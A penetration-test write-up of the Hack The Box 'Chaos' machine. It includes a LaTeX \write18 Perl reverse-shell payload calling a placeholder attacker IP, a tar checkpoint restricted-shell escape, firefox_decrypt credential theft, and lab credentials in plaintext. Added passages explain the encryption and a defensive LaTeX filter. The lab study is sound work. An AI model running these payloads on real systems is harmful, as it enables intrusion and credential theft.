[HTB Series] A detailed penetration test of the Chaos box – by shuteer

Author: 是大方子 (core member of Ms08067 Lab)

Key points:

1. Requesting a site by domain name versus by IP address can produce different responses

2. Scanning WordPress with WPScan

3. Editing hosts to reach the webmail system

4. Getting a reverse shell through LaTeX

5. Escaping a restricted shell with tar and repairing the shell's PATH

6. Extracting cached Firefox user credentials with firefox_decrypt

Introduction

Kali: 10.10.12.87

Target: 10.10.10.120

First, probe the target with Nmap

root@kali:~/HTB# nmap -sV -T5 -sC 10.10.10.120
 
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-08 13:18 CST
Nmap scan report for 10.10.10.120
Host is up (0.21s latency).
Not shown: 994 closed ports
PORT      STATE SERVICE  VERSION
80/tcp    open  http     Apache httpd 2.4.34 ((Ubuntu))
|_http-server-header: Apache/2.4.34 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp   open  pop3     Dovecot pop3d
|_pop3-capabilities: STLS UIDL TOP SASL RESP-CODES CAPA AUTH-RESP-CODE PIPELINING
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after:  2028-10-25T10:01:49
|_ssl-date: TLS randomness does not represent time
143/tcp   open  imap     Dovecot imapd (Ubuntu)
|_imap-capabilities: STARTTLS ENABLE LITERAL+ OK IMAP4rev1 SASL-IR LOGINDISABLEDA0001 have post-login listed ID IDLE LOGIN-REFERRALS capabilities more Pre-login
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after:  2028-10-25T10:01:49
|_ssl-date: TLS randomness does not represent time
993/tcp   open  ssl/imap Dovecot imapd (Ubuntu)
|_imap-capabilities: ENABLE LITERAL+ OK AUTH=PLAINA0001 SASL-IR capabilities have post-login listed ID IDLE LOGIN-REFERRALS IMAP4rev1 more Pre-login
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after:  2028-10-25T10:01:49
|_ssl-date: TLS randomness does not represent time
995/tcp   open  ssl/pop3 Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE UIDL TOP SASL(PLAIN) RESP-CODES CAPA USER PIPELINING
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after:  2028-10-25T10:01:49
|_ssl-date: TLS randomness does not represent time
10000/tcp open  http     MiniServ 1.890 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 58.63 seconds

The target runs HTTP, POP3 and IMAP together with their SSL-wrapped counterparts, plus MiniServ (Webmin) listening on port 10000.

Let's look at port 80 first.

Port 80:

The site refuses direct access by IP address, so we add an entry to /etc/hosts

Visit it again

Here we brute-force directories with gobuster; to be thorough I scanned both the IP-based address and the domain-based address

The results differ, but they share one problem: directory listing is enabled. In the IP-based scan we found wp (WordPress); it is reachable only by IP, and does not exist when the site is accessed by domain name

So we scan it with wpscan; tee is used so the results go to a file as well as to the terminal.

The scan turns up two useful pieces of information, one of which is a user named human

We try human as the password for the protected post on that page; it is correct, and we obtain the webmail account and password

Creds for webmail:

username – ayush

password – jiujitsu

We saw that the target is running a mail system, so we try to log in with these credentials. First we add a record for webmail.chaos.htb to hosts

Then open webmail.chaos.htb and log in

Then we find this in the Drafts folder

One attachment is the encrypted message, the other is the encryption script. The mail also says "you are the password", so we can start by trying sahay as the password and attempt to decrypt

Below is the encryption script

import os
from Crypto import Random
from Crypto.Cipher import AES
from Crypto.Hash import SHA256

def encrypt(key, filename):
    chunksize = 64*1024
    outputFile = "en" + filename
    # 16-character zero-padded plaintext size, written before the IV
    filesize = str(os.path.getsize(filename)).zfill(16)
    IV = Random.new().read(16)
    encryptor = AES.new(key, AES.MODE_CBC, IV)

    with open(filename, 'rb') as infile:
        with open(outputFile, 'wb') as outfile:
            outfile.write(filesize.encode('utf-8'))
            outfile.write(IV)
            while True:
                chunk = infile.read(chunksize)
                if len(chunk) == 0:
                    break
                elif len(chunk) % 16 != 0:
                    # pad the final chunk with spaces up to a multiple of the block size
                    chunk += b' ' * (16 - (len(chunk) % 16))
                outfile.write(encryptor.encrypt(chunk))

def getKey(password):
    # the unsalted SHA-256 of the password is used directly as the AES key
    hasher = SHA256.new(password.encode('utf-8'))
    return hasher.digest()

Based on the encryption script, write the corresponding decryption script

from Crypto.Hash import SHA256
from Crypto.Cipher import AES

def getKey(password):
    # same key derivation as the encryption script
    hasher = SHA256.new(password.encode('utf-8'))
    return hasher.digest()

if __name__ == "__main__":
    chunksize = 64*1024
    mkey = getKey("sahay")
    # The file is decrypted from its very first byte with a dummy IV. In CBC the
    # "previous block" acts as the IV for each block, so once the real IV has
    # been passed the remaining blocks decrypt correctly; only the leading bytes
    # come out as junk and are stripped afterwards.
    mIV = b"0000000000000234"
    decipher = AES.new(mkey, AES.MODE_CBC, mIV)
    with open("enim_msg.txt", 'rb') as infile:
        chunk = infile.read(chunksize)
    plaintext = decipher.decrypt(chunk)
    print(plaintext)

Running the decryption script yields a Base64-encoded result:

The leading 16 bytes (the IV) must be removed, then the rest is decoded with base64
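The bytes that have to be stripped are explained by the encryption script itself: it writes a 16-character zero-padded plaintext size, then the 16-byte IV, then the CBC ciphertext, and pads the last chunk with spaces. The following is an added example, not code from the original post or from the box: it parses that layout directly, uses the size field to remove the space padding exactly, and base64-decodes the result. It assumes pycryptodome (Crypto.Cipher.AES) is installed and that the file is named enim_msg.txt.

```python
import base64
import hashlib
import sys

HEADER_LEN = 16  # zero-padded decimal plaintext size written by the encrypt script
IV_LEN = 16      # AES block size; the CBC IV follows the size field
BLOCK = 16


def get_key(password: str) -> bytes:
    """Same key derivation as the encrypt script: unsalted SHA-256 of the password.

    No salt and no iteration count means a short dictionary word is recovered
    trivially; a real design would use a slow KDF with a random salt.
    """
    return hashlib.sha256(password.encode("utf-8")).digest()


def parse_container(blob: bytes):
    """Split an encrypted file into (original_size, iv, ciphertext).

    Layout, as produced by encrypt(): [16 ASCII digits][16-byte IV][ciphertext].
    """
    if len(blob) < HEADER_LEN + IV_LEN:
        raise ValueError("file too short to hold the size header and IV")
    size_field = blob[:HEADER_LEN]
    if not size_field.isdigit():
        raise ValueError("size header is not a zero-padded decimal number")
    original_size = int(size_field)
    iv = blob[HEADER_LEN:HEADER_LEN + IV_LEN]
    ciphertext = blob[HEADER_LEN + IV_LEN:]
    if len(ciphertext) == 0 or len(ciphertext) % BLOCK != 0:
        raise ValueError("ciphertext length is not a positive multiple of 16")
    if original_size > len(ciphertext):
        raise ValueError("size header claims more plaintext than there is ciphertext")
    return original_size, iv, ciphertext


def strip_padding(plaintext: bytes, original_size: int) -> bytes:
    """Cut the space padding the encryptor added to the final chunk.

    The size field is the only reliable way to do this: a message may
    legitimately end in spaces, so rstrip() would be wrong.
    """
    return plaintext[:original_size]


def decrypt_container(blob: bytes, password: str) -> bytes:
    """Decrypt a whole [size][IV][ciphertext] blob with the given password."""
    from Crypto.Cipher import AES  # pycryptodome; imported lazily (assumption)
    original_size, iv, ciphertext = parse_container(blob)
    cipher = AES.new(get_key(password), AES.MODE_CBC, iv)
    return strip_padding(cipher.decrypt(ciphertext), original_size)


def decode_message(plaintext: bytes) -> bytes:
    """The recovered plaintext on the box is itself Base64; decode it strictly."""
    return base64.b64decode(plaintext.strip(), validate=True)


if __name__ == "__main__":
    path = sys.argv[1] if len(sys.argv) > 1 else "enim_msg.txt"  # assumed file name
    password = sys.argv[2] if len(sys.argv) > 2 else "sahay"
    with open(path, "rb") as fh:
        data = fh.read()
    recovered = decrypt_container(data, password)
    try:
        print(decode_message(recovered).decode("utf-8", errors="replace"))
    except ValueError:
        # Wrong password, or not a Base64 payload: show the raw bytes instead
        print(recovered)
```

Run it as `python3 decrypt_container.py enim_msg.txt sahay`; because the header is parsed properly there are no junk bytes in front of the output, so no manual stripping is needed before the Base64 decode.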

echo "SGlpIFNhaGF5CgpQbGVhc2UgY2hlY2sgb3VyIG5ldyBzZXJ2aWNlIHdoaWNoIGNyZWF0ZSBwZGYKCnAucyAtIEFzIHlvdSB0b2xkIG1lIHRvIGVuY3J5cHQgaW1wb3J0YW50IG1zZywgaSBkaWQgOikKCmh0dHA6Ly9jaGFvcy5odGIvSjAwX3cxbGxfZjFOZF9uMDdIMW45X0gzcjMKClRoYW5rcywKQXl1c2gK" | base64 -d

This gives us a link: http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3

LaTeX is commonly used for typesetting documents; look it up if you are not familiar with it!

After entering text and choosing a template, the site generates a PDF; the generated PDF can be seen at

http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3/pdf/

For attacks against LaTeX, refer to this article:

https://0day.work/hacking-with-latex/
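On the defending side, the \write18 primitive that such attacks rely on only runs a command when the TeX engine is started with shell escape enabled. The following is an added example, not from the original post or from the box, of the two controls a PDF-generation service like this one would want: a pre-compile scan that rejects submissions containing shell-escape and file-access primitives, and a pdflatex argument list that turns shell escape off regardless of the texmf.cnf default. The primitive list, the two constructed sample documents and the build_pdflatex_argv helper are this example's own choices.

```python
import re
from typing import List, Tuple

# TeX primitives that, with shell escape enabled or lax file permissions, let a
# document run commands or read/write files outside itself.  Illustrative list
# chosen for this example; extend it to match your engine's configuration.
RISKY_PRIMITIVES = {
    "write18": "executes a shell command (shell escape)",
    "immediate": "forces \\write18 / \\openout to run during expansion",
    "input": "pulls an arbitrary file into the document",
    "include": "pulls an arbitrary file into the document",
    "openin": "opens an arbitrary file for reading",
    "openout": "opens an arbitrary file for writing",
    "csname": "builds control sequences at run time, a common way to hide the above",
    "catcode": "re-maps character categories, another way to hide the above",
}

# "\write18" may be typed as "\write 18": allow whitespace before the number, and
# require a non-letter after each name so that "\inputenc" is not flagged as "\input".
_PATTERNS = [
    (name, re.compile(r"\\" + (r"write\s*18" if name == "write18" else re.escape(name))
                      + r"(?![A-Za-z])"))
    for name in RISKY_PRIMITIVES
]


def find_risky_primitives(tex: str) -> List[Tuple[int, str, str]]:
    """Return (line_number, primitive, reason) for every hit, in document order.

    Comment lines are scanned as well: a '%' line cannot execute, but flagging
    it costs nothing and keeps the check conservative.
    """
    hits = []
    for lineno, line in enumerate(tex.splitlines(), start=1):
        for name, pattern in _PATTERNS:
            if pattern.search(line):
                hits.append((lineno, name, RISKY_PRIMITIVES[name]))
    return hits


def is_safe_to_compile(tex: str) -> bool:
    return not find_risky_primitives(tex)


def build_pdflatex_argv(tex_path: str, out_dir: str) -> List[str]:
    """Argument list for pdflatex with shell escape forced off.

    -no-shell-escape overrides a permissive shell_escape setting in texmf.cnf;
    nonstopmode plus -halt-on-error keep a malformed submission from hanging
    the worker while it waits for console input.
    """
    return [
        "pdflatex",
        "-no-shell-escape",
        "-interaction=nonstopmode",
        "-halt-on-error",
        "-output-directory=" + out_dir,
        tex_path,
    ]


# Constructed samples: the first has the shape of a shell-escape submission,
# the second is an ordinary document.
MALICIOUS_SAMPLE = r"""\documentclass{article}
\begin{document}
\immediate\write18{echo probe}
\end{document}
"""

BENIGN_SAMPLE = r"""\documentclass{article}
\usepackage[utf8]{inputenc}
\begin{document}
Hello, world.
\end{document}
"""

if __name__ == "__main__":
    for label, doc in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        hits = find_risky_primitives(doc)
        print(f"{label}: {'reject' if hits else 'compile'}")
        for lineno, name, reason in hits:
            print(f"  line {lineno}: \\{name}: {reason}")
    print(" ".join(build_pdflatex_argv("submission.tex", "/tmp/build")))
```

The scan is a first filter, not a substitute for running the engine with shell escape disabled: TeX's macro system offers more ways to construct a primitive than a regex can enumerate, which is why the argument list is the control that actually matters.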

We use the following exploit to get a reverse shell

\immediate\write18{perl -e 'use Socket;$i="YOUR_IP";$p=YOUR_PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'}

Listen on the chosen port and submit the exploit

After getting a shell, we use python to spawn a stable shell

Switching to the home directory, we find that we have no permission on either of these two directories

Let's try the mail account password from earlier and see whether we can switch to ayush

username – ayush

password – jiujitsu

The switch succeeds, but ayush is in a restricted shell

Here we see that our PATH is ayush/.app, and we can only use these 3 commands

For bypassing restricted shells, refer to this guide:

https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf

So we bypass it with tar!

First switch back to www-data, since www-data's shell is a normal one; then go to /tmp, create rick and pack it into a tar archive

Then switch to ayush again

Then perform the bypass!

tar cf /dev/null rick.tar --checkpoint=1 --checkpoint-action=exec=/bin/bash

Then repair PATH

export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

Then we get the user flag

Then we find a .mozilla directory under the user's home with a firefox profile inside; ls -la shows the files are larger than Firefox's defaults, so we suspect they hold the user's credentials

Use firefox_decrypt to extract the cached credentials; project address:
https://github.com/unode/firefox_decrypt

Then download the project onto the target!

Then make the extraction script executable and run it. It asks for the master password; we enter jiujitsu again, and that password turns out to be correct as well!

Switch to root and get the root flag!!

Ms08067 Lab website: www.ms08067.com

WeChat official account: "Ms08067 Security Lab"

Ms08067 Security Lab currently runs these Zhishi Xingqiu (paid community) groups: web security offence and defence, intranet security offence and defence, Python security offence and defence, Kali Linux security offence and defence, and an introduction to binary reverse engineering

Finally, we look forward to having you join!

Source: freebuf.com 2021-02-28 22:18:46 by: shuteer
